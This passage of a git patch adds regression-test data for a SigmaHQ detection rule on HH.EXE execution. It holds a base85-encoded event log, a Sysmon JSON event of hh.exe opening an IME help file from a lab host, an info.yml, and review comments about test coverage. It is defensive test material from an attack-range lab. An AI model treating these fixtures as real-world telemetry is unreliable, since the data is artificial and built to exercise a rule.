zJPlEaq?@FvCSQX|oybe$wT{9MVX!Qs5So48tC#x_g)`_GNZ$-Hx};c$c(+v{iJOqGA376e0C2mjOV2B zoZN)xt*ZN%jkB=1VzBBm!NLNavfVJx>OZ}L)zC%xJ10H_@jCbSl#I`*a zfo7=51!$`!DCJ@qrhXLYDHYoqHb3N{+3rWPsRB(GP9GXEcjj>vod<2+^!3uzfJswr zQMc_oCp~9bliJEK;Ne+|UyY{F z333L{e!d94=OHbWmt}mTsXEzRmF1>i^^LRWyh!sm&2!QZ$?P&nCZvMo9*J_|8SUTu$v057r;;B)6tTMWioFjsM<^xP=) zoXtyP1k^M|&W`{jZqO^O2{B`8Nqe~uRsnt!JO*)GhvOKI{Wx~xpidU&cfcMa0ARxS zSI~-fNR4G%(HGM)OOJ^EgnvasaWWsh6Z~7>>#5+F(~UuwX>Ui)@WOjetxtok(zgFm z{yNZ3TXAq_96es>LtWCZZc5#!Hxc9LH$Ky6iC)UibPg)tvlEEpwp~6Anwp}mmwCtS zEyXu0Wn5shmrh368J7To6KvpL!7y2uPb^d^&_9OXVLSi8~6KAHyx-W`YQF} z%W}~hsRK_smETeiehHN`7QLuQp$-3?URU&JVqAJGaSlWOCZ5sfS^IMraE~d|uc;4T z(&C*0&I=x|D|%7%BLvf-EHMT>26Bka^m#?=Y(f2}pR~?d4?<`!ELwT#UB+^;hUoFd z*#N!JdvT{r-DiolKbFo(AFi_adcCd+2u~jf`hk&V9<=Do#oXwUGPj()QOmR3^zG`! 
zFFDt#B=-X3)~_zz5|M$-^9@^s(KA5M=vTOc9)_Nbe!DMeS(sC@Kr1ydmHQEk)&e3c z)p`+A(+N^@>%@q4ee-^;3s=9Ynp>s7;_|r_)!rdX z&GDS`tQcli8O*D=_Juy{mHpNI=Tj%(Vg3Trqrdu}z=Pwjarpa;dl8CBSlZ}CLWdc8 z*A};JhPJx;x`13cSK(;fgkx82r72+@>)U_4rK5KyS7Nb@kD`RO=Xoba;`E9R#!bpG zn11w#r`2&k=-3vdcJ!Q;J+#Z|_?3)SEqc>*hFqz%)nj?PGhNvOHz0ejyO$urKfqze z@@6cLk*XQXmpQRmqhB+YUuP`;gJk(w{*V9GJ(j=GjOEQ$=JcTC!QLKTJ7{H!w1Z55X7FmC$`qOF z(rkm}9fu7dxWwL>%OtSVQe7TE329TPwEidzjc(B7n$jT7uTNtNC20edjZ+{m#!;G$ zQ{etVQ#gWaXZ>=}a?U*|f>)o8c&zzOnJKSft|XiQXM#!#osh4se511k?d)mnHyrglJ&0PwUvSKt0u z?pfh$tXW|k;3z+F8kf9Q^L2Kh$t^yx|EoXj|H^RUrI`=?>bup(KUn6I!S&y?lxg+% zj-i!Y!{p(!k+;78*;medYWE+47kmQy+w)L{)F~k*vhfx^!eCKxD@vNfx z9obiFL%U!#_K_TkHjZ>_vJ?n%GXFa2GRY?k004lUC*f9?fE+U>di zraBJm9C7*WJjQ3kin3$(^3XZ!R~~b;j1w&{fDX^eC0h4cR%>?0lDS*ay8E%wIs>T* zy&Ig~`-<(}Uam_&KDDD<=$b0g&@=b6UJiT0lly>`bfYN!66(aRDca^~vC-ZJnr4$; zzZH7r+mPaI5%q6d_)F`7qbYhBfJ+<6x?#``NmmSZ z>e^L9`+nN{Y!Uak%L-SGy^|zK`K8X( zzQ^+jc?F}EN1&DOKn?Gc!?;6hFP)(5J8uV_YCUnQpL4SQPr_dPxx>nXtk&nrM9-VUl+C7w`%KWUE8`;vD((JE_wg|bIy}{XXZ>YK_-dcF9Vag_uO;u zdG_Zy&slC|b5qrt=8%f~B-w&a{3fYnrN#szt9<73(*O6-7eDhuh8{3PfguVEQDBGy zLlhXIzz_w7C@@5UAqospV2A=k6d0mFuN0_kZYp2hvQ|m&KGtt1pM<2qzT=eI^!lvK zULV{`1-3Kkg?;|wuXbRXQd82EdOuaEzo+=GD76sfvyg`9>*tAH?zs(Z@^c{Clx-8?>~>&cUDDX#kX)jP-CvJIH9R_R!E z6ApwHKJARM_ zGxbjyY7rh$50b3``fD@@Bwc2TN=wR2R%t1L5o!_&MAG*iK1`iptE~a0T5v5XbA(Ds zfzD0DiHLaP6RB!0Dw0>tx{_k0By|8z4zO}sxg|x_YF@0>Rg&0XKm~C^72s#v#5A=4 z3?y4fA~qM`lTy`WoQUR}_GG#`9+x+RZ>^wXBk0bmscL)*$i5IK-?UFW>e3Ntbd9EI zIjV*L09n+CI+{GxBFfa!TQb5pC^vyTX=-e8AOq6k*^;W{Q9f!f#sdj5Au*Is%FIw1 zgyn0vNeseG{~V#pbv44#tRWGy)}dZimDTW!_cBx|p4b7vDJ>nq)I2wHm>Qi%qd>M7 z{9>$P)8(GW6kq5UA2LhWk;AiND414Dg4scTumW*eITbXS@#diF& zP^7E$G@4ej_G=~Spzvx-TOmN^aFw1M7^B6B#+aY4LPX0^vmS!fqTwdf#;8C_psVX7 zRG?KOLAoe6KmZxH%%=8#%$YSJyPwJoRT?K9h{=zx?ty0 z^cQjrcV=)*SL0Q>8jGt?037j~t}=8z+^);BaW+PcR&(%sP{zUfDdH3OXWYAoA$3Y z-}vbHzTQ7WYb8lRS{s=qU5#n~QguhMI20a_XgF#`;J6Ea`N@(y_I?rUWG!&`X&llg z^HXsS#ZOFog??;3%4s!A@Jk;}Dg1hC3M?5L<<&3Xn?`GyislxBcgvd 
zYVY62t33>?>;T0?sgp(lBG%2abv5hFlSf2|yqMjjQAuhv@0n`v+24D9w3;-kq*2K# zo%Ij4^~rq;eJVtXZi#Z5GzwxA6P7Aan^=aM;iOTiJ={})`gDGj?DgIJN*a~c1AUBZ zY6MMbc9KR7>!B`f7*&&+wi$KPP2D1kC+TDH90R!_6sz!ULH%YW_;_3!-UBA4B~pr# zJy$=46oW#MV$K%JwNBH*GHR&6Jv=5>G|+^1gt?nMr<_q+Exak+DxWlJq^afP_FOz` zmDVgzI$&f8lT-S<`qjWAX;h|hR3hm|dJv3-j8e}StQd;XPSNxltuyzJHjwbgZUIxDy+Uecv*P^}Sgg2HcGTeD7+KMBWG_Jh0 zIqK9!c!)Z1dNu9}=_r6tp02+Pf%5=mG0t<)&J=rJ8T5*_s8N>}q89JT(RUT&C|gZ+ z_@!-l!W`f;58BHkMl0)a1WeO^D6K?W z{LRNv39dm}R2eu;{uQBC70xMXrTAB-ujN7(@^Ds!`qO}C1+LD*{rM;>M4fDVjqOkd zD)7`o)MZQAcwUumu}as=!BZ-6Pad9Rpk!NxcwQdvD8`*Rs87i%!nYD7x%gXx7T8u1 z{^sNPc_=GH%>oNoIm%eS0A(dOF2g_4G*3T?_pxpfO8A#|=b{xJ73wDw)@hpC3pM2k z*(}{o1)j&}5Rx3-I=hCIxR(^=^YYMcF3PBRh5CuaG#}T%#9Xhj9G3~XWds#T6#MB^ z(z28YL_G?o0dwPXQ_HU&rZ`Os!uAyn%3_rXdsM3}2IH(CvN!Yw!3dA8V5R7@>Bo6Y zKh6*_2j5(LqeVZKH$`QzP^m42`Pq3zB?V7XGlaIOh($krsEAr8}{PJ+?i94wIgw>r43ko~7%sDu3)XS&VCPAHI+e66B?3{8 z^o*AGr>wjm2745qFPN!to{u5*{?|c3PgS6?^%1u z-_ZL+Yh!F*6V90gdY-f$Q2_B|5=TjKDifCmpKvQ9l0WA$ZHe^&A9?21VY&;$PfM%3(D7*uGgUyPA!^}&r0*b>)@e6PeHq4uW z(j6%59?oUKYq|ja9}eBJfKDbU(+^ zb#!!0##jTBf38wuzfFAc z5Y|_U$J3AfPwmf!ZC?48ySLx}LuixL@2xl-VEsPOr{A{&TI%=p__g}IPh9#v59Fdv zMxNBuY^D&Y*OfZ`R{`BMdQL57O0oh8Lh3VgRx zAzd{iTc1~5ZPdCNP@~7F*^oATI+du9Irmh{>T2@`ha}~4Knx!q*Zk+L759I8?je_4 zbJb+38g&Ymix&J5h%p!_gk!9Utj!^ zPp_|>abxNI76u-Fbonc%Jhr-|?V11Hk#Vr6*W(9XuP;FiB7S>cph~?)LPAD7lQA}4 zgMUMM^!e7KN07LHuqkAS?Wa?T$V!Qbvcu>7+WNewpb%SNb3?G%`3QzqBE66co1BXh z4wG^aH3z9R6N@pKmX9*#!W!^3cdW!+90DzX#b#>HOTmZF@yo{0sTum@02J%5L~b(( zPr#&wHye;=s}Z_&pk0&r3nHP{j#?bz2_kgitV9k8nW6saAOe+Isi*MG3YNDvhGqtr zF0RG@>T+gM^GkB`P+s5M99f=Im=#=DT`@BlWWDT?;{2>&ZTERzUQsUYo5$kgbzcBx$R~xX$D{BirujwN@*S)v&(HI?I z>GYAzK%WhoBrs7FbKW>4qkHxN7@#7j$H-{*d}SsGa(YaOO%Q#Y3Z|M*r^w~hUB7O6 zvI0|{_3sOTi;?Yl4PTMpuu<*kahm9yr;KU`?WiBuj&OXA0W4>yw&_I*%u4Qh?w&VS_xmvV$0A0D6c+`CI|edSBv_{Yh&AH^h< z%~ySU;Pr7VK#+dzqkxwB_yB%wzUsiZ@>TAxi7$6m3|T2bzoQ=i$RcK}iqY#~#>z}w z^pqM05jQ?v1dPp1;KG3TB-*sMS;>GIDQ@Zs<27rTqa1Jv*EhS|35n@8I_? 
zOULwEo=YGdMGoKd(NS95^|ymY{Gn=?O8+~5UkH$nQ?MRfAnQju+KIwJOP_3*lOI_6 z!K?vE?9fmcOE(7Sm=_CFOI_D0LT0H0T+oc2r%Od zuEwz|g(kr4(IBpcp=*VC44+LJghcwMJr8+z&%4hC5fj)^NXUq?OuH;UL=k*^I+X~v zIrjwKMgab)$gIMCNyH~WJ)u2$3KzCneK~M>dP%gt?CCtN3n6J)pcIJWLa4MfzaWcv z5T8?1l)BsEGeupq+{5R96D}`!r_8j#<82dm)*jVx@j;tMeS7EOp8oGY@cMs+Pyew7 zOzVGGXvVeJ9C+Y<14H^f`1M=X$%uISf0qXs;e+D=D7OA|Vve{GT&X7l-N)%_#euJM z>;7`gWZ z{Y;7LmLpOoFPmwgowX<5J%h(42m6l(Fv2kA>744m8+Eg&2;<%(5K zjLE}wc8!Mw1ZUY2p^ z&BZf3|8vN|`=4uJjU@g&47f4=3|m#r9ZRUb?4C10#WB<&KQ#FLkeCbCZ@Eo7c-K0W z2(XliU^~LHpdDUk)$r6Z=TMlA%6f=Nqdd$0QeS9S*CUH@uhpAp*6q8>)0?`sHz(dY z7YjY07(AYLVDX}ZPPzFTkN&gbydQgd^Mircn?nJD=nXRr)SKJzYxBZia3rImGYZ~( zuplh0FCWZ#h+Oi_%ox{$X2Af{i*r5u?jG{`Sb)sTcgO7Y_L3+|c%+$cNJRaZu&?}4f zyYHF}Be$IMt1(u$Fo!V(hl3zj+X*cTWrDh3g+HHCcwQzEP*QSDo!2x?&`fSv-oAUHpmpOf8-DTq&;ve(5 z%<6ONofK?^f{Co?sl@sojcbJw*J-chUk*$TXVaO@>^R?!XWY1k+4%64_(8p@{dCkY z8v!*U)T~7eU#gd!&q1$bF~ZMUbs~Bi^YH{`{kgb$ZG`_}+a_v(`4-}z&+~BO4X$$GN*Hb&V&=)0!`IOBuwQ9b#c&%E zmQ|sI-lhuPrxf+8K!0u*((QRBqmA%^8X2KxBx$zKGaa^t=o&JnhnXtr&EbKnsZN09Z}~5U(|UtL}wH1p&1|K4j4Asub)GGr`|J9_#>6{W-vw0HujD&3W~)cd^-d)%OMQXJfg-DfCvf$+l;k_7z;JK3_`H8!Yd_$# zIgMcksF~uiOj;Iv1R@7MC!~2vDfiw>{t4K5FeP>9KyVn?Z1viT)gjBu{jWt?tKH)+b)jhX?YI+!6|4|r+AL!Sdk*8$lcGe#O> z@i|s`V)(xSI@An)bEJnGWBcdqabxSX+Wrj=TOe`}FU*|QMytF*M|dWVp`Bx_xBD20 z3u;EBh<)|wA9cKs9`60tPyQ(LtbXv5)uWA{e9ITwNXr7GK;-a~hmH39WC6nG287n! 
zKa$IvxPLMy0&-DQK90G}m8l;tUgtzXUS%Ae2U;?Z&pq}^aLkET+;x&Zjyo_H<4)FO zNM8glaQYyhn1gG4BF{Ng!$nx^0uoe9r2Kykz|Mz5Fo4Z@`u3Y<@r+-fdb{yUcqBY{hsgd=%ZQu?ot9c;K$t$LpUZU1{3c%@8J`;>ll5+hzhj8?|Ylc?WGL2iVO*)4`;7#Tq+elmpmlISVvSTpG(s z0puO=prs^srp)XjY`hRPkv63P6c}uJS7NcFjc)`--1U_@Mjt2G6#_r-g;S2GXG@$ejKKx9~!kCesne$4BBe9~lmYAgh=k$du zah=g9eFTRs>C1C~7ms*8`0z7P3m54y)@58}A{55yj6aDf=Sa{?)NAh2qMC??`e(d^ z@r{GgzL>Zr1bz@ka>!ss{aXq6iJ#fUn_Of3Oi5+*LTgLg!svxHseyx!eL68`a_J& z-I++Qx5QZ4U5BOS>t#n{=N7~J>n5uh>$!}`8EsQ@JxEL+jxd{cqw}Z!JZ)@9nvm;Y zPL`Ps1BbNHTfZ+udell?j-AGas}IrNXTN_JE<9lS{a^f3XFv4&Igy5+^OC*%xU{S< z;EzD$==b|4(vY6f?{+YY|MKNoO7CMvJc;j^0M;y7e4lCBxY?UWBjcKTdVC`!6NhGd z_)5zHqd?@qx6C($LyvCye8vmVThyYAF&yP?CM2&!@r6_J4xx4oF>cpUD}FO=$>YbI zH*Wjp_cK00v0l{E)%6|@-?Y_EPD_W-$Q!JdVUQe?%gh_9_&Pc6$`}a^_wfp%QWiGB zfPvEi2@HB#>?xDHK`oQv^o zMh$E_7E!`k9%aX2|0H~$hBd`rXNq!1eOeF3?y&Orlgn!oD1S?>UHN;mCx6mnEcp}2 z`d$7aNj)Y`QjY;~D?sKq@vX%7Eqs;wW%YBUGwJo<6 zb*x{+@$|2+TU7VNq(8s^Z1KmOiD=ieeF299JWu7Dz(wY%aDg@FsqBScJBf+!3a!DH z(|d;Ib9}z%b0ll05r74kPp1;Gl@bwWhx2>M7YuOzPz|gUtt6)bFx4~-4q_TYfMS%@ z;oo$8%>cZAf43ku7W9VAf|w;{29+3idTYh`;s(<~9UPA_xl9sqkZlEm4JNqCal{=% zi%@rkKIa*)ninJS&L-T^rU&#_>Qs!voeFjNm!ZA_?CcsaeQQcgDNgXAepAmcz!JSj zte$`HoBbSmzNh21=ZDe12Vnc<)2XCoDG`Vqth#@gH$EkV3};mZSVi;)H=_t)26|pO zda03#x5*%8)JjxP9jT7PNE6?Y#^ZT7rod(6&0p-XRe|~DEp7$+oSXK}#GT9)ACK#Y z;45dWk9l>vzS+J|YM8fB<=ba24689!Lzf!?9TlPg&vQe^oRA+rW>8FK*1*T{Le?ONl#x5aCGSvs#*px5C)pNk%~StiP*p@z<}Y@f+F8)?h}JZ1z> zsO9H2Egx&J%#%#dR?+VHuN!J|OoMdt^w~&)UqX%jj?^lSlE=1@;abHpFH*wbLEGv{ zv(z+N<+nlJ6;g|~Nnj4wDvlS@;(M}855rM5Y8v@R?-IWxn>?d|)uW^b4JpktW8b}U zQ#uveGJv%U8T2&D^pQ))Cn+-`Hci*Wk&-dITE!wRGH{8JfvB)pstM_wB|Nx8@x zjLN(ke*0?ZY$&i0-p+VOb8fsN{SIju+dpy~B-%T2hesVo zNG=Lc^C$tXYu**{y(Y>M`j~eTQw}7KBnKEpl4jz2Bk98$?8A69qUmF>_oRpO28qjO zp%1+|pJDnT{z%_YF4CiuGKAD6HKtss64}2s_ENOd=tE?*XfX8f=_y(iej8sAX{{Nv zQ67!AaJNP&4yRxI?fLDlw8B2SfyQr{qOV5BjZD`_JvXeoLm5V0jNuuHaD@logx-!+ zJYNRP@#WRHHcMY8Z_Gc&{*2maX*o}eGD#md4VX0|{lCH9Lyc!S-y+MoGSi{|d;;Z{ 
z{W;3QRJ3b8C8~;X9^<{IQ1TNS?_Iq2qhI)+?)O|KYP`_39!gpk00kmPyvHgL<6|u_ z!^DI5j0q_9sKw{NtDinH@%XsLKc!{CM<8vWxu&QK3y6vTWwRZ;V&^UEq< zAc6Gfi&k8G%()c3AtYwieBTaA;Ym)D6qtst^I%VM4$f|crG5P}jGR$#=YT=SSVjng zID$1Yz_G3Q7w_J_O12f}&$U)G9_c|e1R{rMY#I^`^jJkH_S_JP>2Wd=Wc1Bf-pi~I zxx&E}^R;|E7cxZo5q~z@%F(QwZ&|twif-hH{%m*m=W+^=Ep+)aX<6S(-cB59=ONslre+)bJC(F7^bm*~^hojzX-ajt7U6F(@G7_XOg`g=Z3RZeRv<^;s@GMv z;Fzyl<(zfV=WKn%zda3<;{Btj@n_OY`wIjP6_#!d3%2$H-LBQ^-owXBrDZ^-KLU}1 zZky7)JY{UUNjT9P)krPVw+YXUb2ARF@6z+ACHoAfhb3c4;bS4@j6E_LPvSZOFW=0b zh&eZPIIbimrsoye3uHDdc1E7Pd#~@y@ex0Cob~9nEoUBd>>vAcSl+on=am@f{C!5# z+u{?X-`6|s_*_Fde-GRodvN(F7EUd5W?=F6PzeijoAHhan*N}`V)}=Y50Entp71=1 zoOv`dSr!9Tc+Z$4H5|2wk3t;L^e7~7nEZvDc~JQ|XO0CTb7tTPA5~$_wx>~WW<~fE z8PoM=Q+ThJ)08t09)Bjz91A@DOk8x%(&R7q%&4E4OV6x{m$_m-pipc06lg=_sF6EY zVYDc|EDqOz^*-iD-SlUVY4bhZG}#72dt*7c3P2>%Z&hYOMtH?=*FDk~J_p0tyl}as zzHp{Md~!+r$V<^&4{ols^h52}T>scQGj6;~p!Q28^_JQjnQt^>#LULzMRBcXOG63w z;59HBEn@!L53iR6By=LLEDay=(^H`4z<<(@o(iv8Y5nN=KfbRY{OALAyst7~ou=wk z(z28YL=HcCrEk2iXFtjnLkJRjh(Fkmhg z?V2fNb$T{2*Pu1){*o!JLDaT=hYy7;*Kw7M;i94YJ4#hBPQ;;Yo@80xXI=H znLQ65aiLDQ=PZRwl_xuX>&xu2ryqW)^5j3<$1|VLm0NzBMX1c^w`AL+bLqxLdAany z*sOR*y!`gxZ~e`&(HCOu(Sk?edPJ)G;|AkDxn4UQW7;G$w%=EM5083iOT}_Bqbu+b z&TyaU=Z@cJ`XdW^598}RXo&%5Czz44zRpD83?099^4q8AnNt1{oNzx7JL+J}K~44` zW)7V786UaqsoM)ij$IiEGhc~Zp^ zZ~TgW!n58S!!lQ0aSmtxQ?onn_$k&b=m}TE^(%71UI~|?;c_Fzv()9gpt%FpZL!l zncmrF8)5t*<4VcbRoVD*{F!@iU*DbI>d$`}#`E^Y`at=U947`toBpb_@uA zrDdUqKol2$X?22r{#ILjru_cd`x1|ji@(yc;3E(@@aY?W=>vM_FEW09{vK!PvGk?y z{eH`U@K;(EdI&@gdaz2k{xTZQ^Yiz3i_iF}U9Tn{9~Xb6Wx+=va^Mp`f6aJGZXEoD z-}Li$uBFHGKiS;gIUxL%mW3Vyk%J!5{M9qP{QR9~@!9EI$9b z`0Cokvh!(aW*FTT~yU%o@?-&nn|r`LsY z{}L`|_dcCUT9z__$UzVP{v|bfH-`<#a`FY{v0enk-p4fJ$^ODJ#Md}Ajzwy3jS>CTUo0?>4(C0`t?efP5bNdMNgS5;ke-5b+ho7^@z*4`J7 zZasAAMyx63{3S*_>1wP#-gdMh8($h5Bt3<$wU(~?|NFy!pzBy4U8TiXbQQ=xCv-*b zRp@#T=)1(y^^&rE-n_S4UbAX`bI|u@?0NkR1dM(L#&nBqr?mVWW|mCDRwM$ELqA{i z&EF`;o(r=u*1$21H5dt@^mQn{aIqPq5nK%4jI+f!ZnfnmJF)<;V3~z|_W6&a66SvD 
zIPd2R9Qkfi<}nsHpU(yP4f=XHt}nq@hl1bZtF7_@O(k+7%(0cCH_F#n@m~e5W$QEM zeJgM!5BbI_)Zt69_*xR)m8Y*T%ULP30StNsgnW{G#0i#PZ&m#0>ifF+)t~tYX<48Y zh#dT4mGJ(IUM1;|hn8A=7B&`tKk@ju{H3%k_y|M}eB$?)?9XuYv-fxi5u*6ZP2lq~ zOOJ1#xbL$2yZL+Nj2lZ&*niLKDdil({ zrE6LmTQ|1XwQp|k2(8P@t=rJvzM)}yXj3Q{3}ywFw1?Ve2ItqWL+kTvgQZJq=PX!U zU3+3(&51R&mGhbZ_%q0MX%PZ_}R{Gy7#MI*_HvC{s=@4 zy7PLtUeP0$`}OK1i_gI~UiXK@}YyPo6-Xn<9Eex-7T!Sn|a7 z@BDl~_$w_7Jp>{LJy<22zi>JA-SaMqSDnS@-&-HQEAjZa_$w_7J_3;gpT6;z<4nEV zO}zch&)<_RJKzfk>fC@T71_0=B^tO zkB^JL(z4(q5IOLPpT8y#lotno(cSa&x8Bm@;g2$J{Yy80`*U8rv@G-xh#d4t^7TWc zI%Y$O{_=OF#i#oIohx7N#-~5y329jX6o?%7uu6o#k+_JzQ9R?qm_Q-?-31VuEIoet-f@?`-ObBY(ECe^p0Bd_{@}?Yx4zenZ-3e=X<6_Uh#dH`N`$?_dfXrQ<$1Nm=i{dB z4Oe^0ac{5AKwa}tk_i@(yc;3E(@@QI(l^heAV#=+m|-S&!fS!?O>%0&|z zMh*ynrDdUqK;)nYtAz8H?kKE(+idZvIIiQ2#N*@Que2=q2t*Ei`pVz9;^XvWzy7YX z^froSx~pHm(_?4-ow=EqMNd?sD(`H%%pp{_X+@?Uo)N+<9H?>~8+{XMaIj7J3Lo4tnfH ze}S)zAfD1+=&<-c^{Zv4m3HIXpZx`CS@0Ez9Qd+IM7+_8VPn5MpJDN-esA4biO0t! z&(gBsBM>?8iC>irP!$$WZm{$?_@c>2A2%TUm6nAb0+E9r4*ssdz`UQo8!bLp zsNDI9$H&EAX<6_Qh#dIzjlW#k)VsY>rF)6JB3(9FdMy6Mo%=2y5dKQbLJxt+L62zu zmSSIrYCnHBTYNg79(`ou@p182S{8f+A_qS4^Vh^1apkXuhw1N`mLB^ont5hZH-Gyx zpDry6Jp>{LJ(3*xbmhex_y)f{I@{8t_QyB8eAa;QS6UW&2t*EgIQUyN zD>;n6U$XdYefh!n6OWIJztXbcBM>?8iJ!k_yd)lbgf(=2{(jlg<5%y#`=9d%gul|V z&_f_{(8Iys25bT4*WXTy&&Q)q$haWk__+8hEek#ZkprLj`Ahxf`%!w2CswF>;qNYh z@D)ps5rsk z!B-%1;L9oz{wQ;t8ts?ouUdTW{^rbU6OWHeo~32MM<8eZm%$d zPV5!wa-OBf+Yev+&>aK9UujwBArLv}!735@n}@07e*T_s@%i`3PyaUY__+8hEek#Z zkprLj`D^0Ic=B;w`-k!O0!xpKvg(`f9uWRY%R&!<$UzSWf5~w_e=oH7TtD(h+Y^tE zi@(yc;3E(@@aZdm&u z!Ix|5xQm+EO^y4gwPKA@i(b#f_e-<>v3fnzDwKt==4mzRbG1?kYlb+0&ZlxmH$E$b zbwy{Ov{BdPPDge6Wuj)~Ub8MWFvNN$_jTjiKJMJcHC22|xvL#Mdpe+KN4pBSNbXF- z7e-IP3ausBjb<)(p6Sb(5L{6X7;kgE+9g&V8bV{%d-Bj9>nf$i$n}2}SkJlaP!F;m zSNFST^7c=3UAJ-T*&20fGav3Il4cOZH;&ZlS6vQ!g@ z!rp^Dq*r@Ruihlz$^Yk|SKrv<{O`%mj<$AoN0xBAQ$_M$AnH+{qUGUnn?pVf624H| z#YWh_2G}s}*X_4)!7$6o{kgJGgX=my+o<;$)iy7PXVAv-h4Ue8V;fPsT|b+vM%(eP z31_sZn_&n0V(EIakV+kfXKks&nvE~EY8a> 
z%g#PqX-nTgev+@Z2uw!*?%Lk9D$3vhx7}`6GVqo0d;o$NTMXqWqeFUAwf{_2TGizS({ktO7suYX?kH zN+9czUxUZ5Vb&z$1k&|XNa5v{t~dST6;K}1{6L!`f)o}4an@4?n z=i$JgW~Fp5wLcE$;fuY(RN84cNDUMq*y78s*2A34z`u5wh1F1hzLmWlg2o`OL7Sa+ zn2RRVl%?b|5X3RSGcN<-;wQekwitgycm)Cb0UdaP|12rc)pZ4M`4BB9Vch{Xa8UbU z2JCo(gK-9clNM&fl1r1-KDf9Ai0fAqeHRCrDJm@~Gg+mj1V&(XmQqimFe!6{N=d=9 zS@5AQKu0qrkfaL^Ol1vhOpyXQu*Pg%fZZxm0;#%Sl`hb;fx5c*R;J5Qpqt!*gUmEF zHaTG4cJPL-iDN9(L*HDfiSiz&WBK}~VQMtq^n?TCA(L&5|F7Tl)RS9WuH7QI5>TC> z6h56w1lOE<0^OrJM!UsgU-x4fuqW_z)eF| zXa{RLBy`u@N}9UUpkd=yyL?T=v0?WZr|jKh+6zMOcz4jzYCB2^6YH$et~`jg*ntY+ z$#m)LG(|gmI&||%(RM}r>lN0%lx=+U#c2DoJNw%7Bp@$q{~8Dr5NTQ96NvgKAUmyp z3rXj?|#&nV#t^2u3-2rDZ||#9&$CU%wSl>PpL}{P%y|4}5yk z!6#{1AQXuD$fvt@n@`+hBzL#?#GU`Cd^O$CE=Iw?7o#pzCgGBBCX!cz^vD4A^&~&2 zKg@ewW%=^-!)w}}?9T7>=lGelEFcO*j(iuZgy-Ko)F_qV&);2b@p<5#FQ1!ud|dfE zX<6_Qh#dIzEq}*7D0?4Yf#GHT4l*$rdTaVa0t(BU)HNT%-|yH~dT;1}+kbz-y4kVz qhI;B(PfwlmBq@%U7{VoDX1S$)rux&y^8aSM_h&qCwi-7FKmQ9InZ!N- literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json b/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json new file mode 100644 index 000000000..e56eec8aa --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-27T00:11:22.294854Z" + } + }, + "EventRecordID": 33639600, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3380, + "ThreadID": 4420 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-27 00:11:22.292", + "ProcessGuid": "5AA13A44-B8AA-68FE-3F02-000000004102", + "ProcessId": 7784, + "Image": "C:\\Windows\\hh.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Microsoft® HTML Help Executable", + "Product": "HTML Help", + "Company": "Microsoft Corporation", + "OriginalFileName": "HH.exe", + "CommandLine": "\"C:\\Windows\\hh.exe\" C:\\Windows\\IME\\IMETC\\HELP\\IMTCTC14.CHM", + "CurrentDirectory": "C:\\Windows\\IME\\IMETC\\HELP\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000", + "LogonId": "0xc47e5", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=641EF54FAECFA4E912DB88075FD25AABDB233A79,MD5=44A6B0A791E00D169EC0FFCFF0A17EB3,SHA256=39811F6070E82E9AA67A4D3E6153A7CD70519DBBAC36067157C573E2F736AA9E,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C", + "ParentProcessGuid": "5AA13A44-B55F-68FE-1A01-000000004102", + "ParentProcessId": 8100, + "ParentImage": "C:\\Program Files\\Everything\\Everything.exe", + "ParentCommandLine": "\"C:\\Program Files\\Everything\\Everything.exe\" -startup", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
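Review bot: The only positive sample in this hunk is a benign-looking invocation, `"C:\Windows\hh.exe" C:\Windows\IME\IMETC\HELP\IMTCTC14.CHM` with `C:\Program Files\Everything\Everything.exe` as parent, i.e. hh.exe opening a Microsoft IME help file from under C:\Windows rather than a CHM from a user profile or download location. It proves the rule fires, but it also documents the rule matching ordinary help usage, so either add a second event with a CHM under a user-writable path or record in the companion info.yml that this event is the legitimate-usage case the rule is expected to match; otherwise a future tightening of the rule that stops matching C:\Windows help files will look like a regression when it is the intended behaviour.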
diff --git a/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml new file mode 100644 index 000000000..67ee105e9 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml @@ -0,0 +1,12 @@ +id: 627bc1e3-7961-4d77-96df-915627f8c3fc +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 68c8acb4-1b60-4890-8e82-3ddf7a6dba84 + title: HH.EXE Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.evtx 
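Review bot: `regression_tests_info` in this info.yml has no `match_count`, while the AdFind info.yml added in the same patch sets `match_count: 1` (its hunk is `+1,13` against `+1,12` here). If the CI script treats an absent `match_count` as "at least one match", this test cannot catch the rule matching the single event more than once, and the two files follow different conventions either way; add `match_count: 1` here. `description: N/A` should also say what the sample exercises (hh.exe opening a CHM, parent Everything.exe) instead of a placeholder, since that is the context a contributor needs when the rule changes.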
